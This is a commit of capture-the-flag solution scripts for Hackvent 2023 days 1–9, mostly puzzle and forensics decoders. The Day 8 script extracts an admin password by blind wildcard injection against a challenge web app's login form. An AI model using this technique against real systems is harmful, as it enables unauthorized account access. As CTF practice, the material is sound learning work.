Initial Commit Day 1-9

Day 1/decode.py

@@ -0,0 +1,32 @@
+import string
+from bs4 import BeautifulSoup
+from PIL import Image
+from pyzbar.pyzbar import decode
+
+qr_size = 25
+pix_size = 10
+img_size = pix_size * qr_size
+
+with open("templates/santa.j2", "r") as f:
+    soup = BeautifulSoup(f.read(), "html.parser")
+    img = Image.new("RGB", (img_size, img_size), "white")
+    y = 0
+
+    for c in string.ascii_lowercase:
+        bin_str = ""
+        x = 0
+        for e in soup.find_all("span"):
+            if e.text.strip() == "{{" + c + "}}":               
+                if "a" in e["class"]:
+                    color = (0, 0, 0)
+                else:
+                    color = (255, 255, 255)
+
+                for xi in range(x, x+pix_size):
+                    for yi in range(y, y+pix_size):
+                        img.putpixel((xi, yi), color)
+
+                x += pix_size
+        y += pix_size
+
+    print("[+] Flag:", decode(img)[0].data.decode())

Day 2/decode.py

@@ -0,0 +1,3 @@
+data = "G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++"
+# "PGP++++" -> Philip Zimmerman 
+print("[+] Flag: HV23{Philip Zimmerman}")

Day 3/decode.py

@@ -0,0 +1,58 @@
+data = [
+    ["8","c","t","k","3"],
+    ["2","r","H","V","r"],
+    ["2","y",None,"0","v"],
+    ["2","e","n","3","_"],
+    ["}","3","h","{","m"],
+]
+
+def find_char(c, min=(0, 0)):
+    for x, row in enumerate(data):
+        for y, v in enumerate(row):
+            if v == c and (x, y) >= min:
+                return (x, y)
+        
+
+def find_key(cirb="HV23{"):
+    min = (0, 0)
+    key = []
+    for c in cirb:
+        key.append(find_char(c, min))
+        min = key[-1]
+    key[3] = (4, 1) # or (3, 3)
+    key.append(rotate(find_char('}'), 3)) # for final '}'
+    return key
+
+def rotate(key, rotation):
+    rotation = rotation % 4
+    if rotation == 0:
+        return key        
+    
+    n = len(data) - 1
+    rotated = []
+
+    if isinstance(key, list):
+        for (x, y) in key:
+            rotated.append((y, n - x))
+    else:
+        rotated = (key[1], n - key[0])
+
+    if rotation > 1:
+        return rotate(rotated, rotation - 1)
+    
+    return rotated
+
+def get_text(key, rotation=0):
+    text = ""
+    key = list(sorted(rotate(key, rotation)))
+    for (x, y) in key:
+        text += data[x][y]
+    return text
+
+key = find_key()
+
+flag = ""
+for i in range(0, 4):
+    flag += get_text(key, -i)
+    
+print("[+] Flag:", flag)

Day 4/decode.py

@@ -0,0 +1,26 @@
+from hackingscripts import util
+from pwn import context, disasm
+import re
+
+if __name__ == "__main__":
+    with open("bowser.elf", "rb") as f:
+        elf = f.read()
+
+    context.arch = "amd64"
+    offset = 0x1332
+    flag = b""
+
+    for instr in disasm(elf[offset:], byte=False, offset=False).split("\n"):
+        match = re.match(r"movabs\s+(rax|rdx),\s+0x([0-9a-f]+)", instr)
+        if match:
+            flag += util.xor(bytearray.fromhex(match[2])[::-1], 0xFF)
+        else:
+            match = re.match(r"mov\s+WORD PTR \[.*\],\s+0x([0-9a-f]+)", instr)
+            if match:
+                flag += util.xor(bytearray.fromhex(match[1])[::-1], 0xFF)
+            elif re.match(r"call\s+.*", instr):
+                break
+
+    flag = flag.split(b"\x00")[1].decode()
+    print("[+] Flag:", flag)
+

Day 5/decode.py

@@ -0,0 +1,47 @@
+from PIL import Image
+import os
+import sys
+import operator
+import subprocess
+import shutil
+
+def extract_frames(destination):
+    os.makedirs(destination, exist_ok=True)
+    subprocess.run(["ffmpeg", "-i", "aurora.mp4", "frames/out-%03d.png"])
+    print()
+
+def parse_frame(file):
+    img = Image.open(file)
+    pix = img.load()
+    return img.size, pix
+
+if __name__ == "__main__":
+    
+    output_directory = "frames"
+    pixel_sum = None
+    count = 0
+
+    extract_frames(output_directory)
+    for file in sorted(os.listdir(output_directory)):
+        if file.endswith(".png"):
+            sys.stdout.write(f"\rAnalyzing: {file}")
+            (width, height), pix = parse_frame(os.path.join(output_directory, file))
+            if pixel_sum is None:
+                pixel_sum = [[(0,0,0) for y in range(height)] for x in range(width)]
+
+            for x in range(width):
+                for y in range(height):
+                    pixel_sum[x][y] = tuple(map(operator.add, pixel_sum[x][y], pix[x,y]))
+            
+            count += 1
+            
+    print("\nComposing new image")
+    img = Image.new("RGB", (width, height))
+    pix = img.load()
+
+    for x in range(width):
+        for y in range(height):
+            pix[x,y] = tuple(map(operator.floordiv, pixel_sum[x][y], [count] * 3))
+
+    img.save(f"result.png")
+    shutil.rmtree(output_directory)

Day 6/.gitattributes

@@ -0,0 +1 @@
+memory.raw filter=lfs diff=lfs merge=lfs -text

Day 6/extract.sh

@@ -0,0 +1,3 @@
+vol -f memory.raw windows.info
+vol -f memory.raw windows.filescan | grep -i "png\|jpg\|jpeg"
+vol -f memory.raw windows.dumpfiles --virtaddr 0x918b76c517f0

Day 6/memory.raw

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0d38311133ba9580a4bac36aee55f4f08a75f0462cc040907a179ad4b4351c87
+size 2147483648

Day 7/exploit.py

@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+import string
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+
+import socket
+from PIL import Image
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+HOST = "44c5decd-6619-4ce0-859a-882ed74f1736.rdocker.vuln.land"
+IP_ADDRESS = util.get_address()
+
+def get_image_bytes():
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.connect((HOST, 80))
+    sock.sendall(b"\n")
+
+    data = b""
+
+    while True:
+        b = sock.recv(1024)
+        if not b:
+            break
+
+        data += b
+
+    body_offset = data.index(b"\n\n")  # malformed here
+    header, body = data[:body_offset], data[body_offset+2:]
+
+    return header, body
+
+if __name__ == "__main__":
+
+    header, body = get_image_bytes()
+
+    flag = ""
+    while body:
+        offset_index = body.index(b"\r\n")
+        chunk_size = int(body[0:offset_index], 16)
+        offset = offset_index + 2
+        chunk = body[offset:offset+chunk_size]
+        body = body[offset+chunk_size+2:]
+
+        if chunk_size > 0x900:
+            flag += chr(chunk_size & 0xFF)
+    
+    print("[+] Flag:", flag)

Day 8/exploit.py

@@ -0,0 +1,85 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import string
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
+IP_ADDRESS = util.get_address()
+
+def request(method, uri, **kwargs):
+    if not uri.startswith("/") and uri != "":
+        uri = "/" + uri
+
+    client = requests
+    if "session" in kwargs:
+        client = kwargs["session"]
+        del kwargs["session"]
+    
+    if "allow_redirects" not in kwargs:
+        kwargs["allow_redirects"] = False
+    
+    if "verify" not in kwargs:
+        kwargs["verify"] = False
+
+    if "proxies" not in kwargs:
+        kwargs["proxies"] = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
+
+    return client.request(method, BASE_URL + uri, **kwargs)
+
+def login(password):
+    while True:
+        # post payload is not URL decoded, so we can't use dictionary
+        res = request("POST", "/login", data=f"password={password}")
+        if "Successfully logged in" in res.text:
+            return True
+        elif "Invalid username or password!" in res.text:
+            return False
+
+def retrieve_flag(cookie):
+    while True:
+        res = request("GET", "/admin", cookies={"admin_token": cookie})
+        util.assert_content_type(res, "text/html")
+        if "You are not authorized to view this page." in res.text:
+            return None
+        else:
+            match = re.search(r"Your flag is: (HV23\{.*\})", res.text)
+            if match:
+                return match[1]
+        
+
+if __name__ == "__main__":
+    password = "salami"
+    flag = retrieve_flag(password)
+    while flag is None:
+        found = False
+        for x in string.printable:
+            if x in ["*", "\\"]:
+                continue
+
+            if login(password + x + "*"):
+                password += x
+                found = True
+                flag = retrieve_flag(password)
+                break
+
+        if not found:
+            break
+
+    print("[+] Flag:", flag)

Day 9/decode.py

@@ -0,0 +1,22 @@
+import os
+import re
+import datetime
+from bs4 import BeautifulSoup
+from hackingscripts.pcap_file_extract import PcapExtractor, HttpRequest, HttpResponse
+
+if __name__ == "__main__":
+
+    chars = []
+    pcap_extractor = PcapExtractor("secret_capture.pcapng")
+    for response in pcap_extractor:
+        match = re.match(r"/\?door=(\d)", response.get_file_path())
+        if match and isinstance(response, HttpResponse):
+            request = response.response_to
+            ip, port = request.socket.split(":")
+            port = int(port)
+            c = chr(port - 56700)
+            dt = datetime.datetime.strptime(response.headers["Date"], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
+            chars.append((dt, c))
+    
+    flag = "".join(entry[1] for entry in sorted(chars))
+    print("[+] Flag:", flag)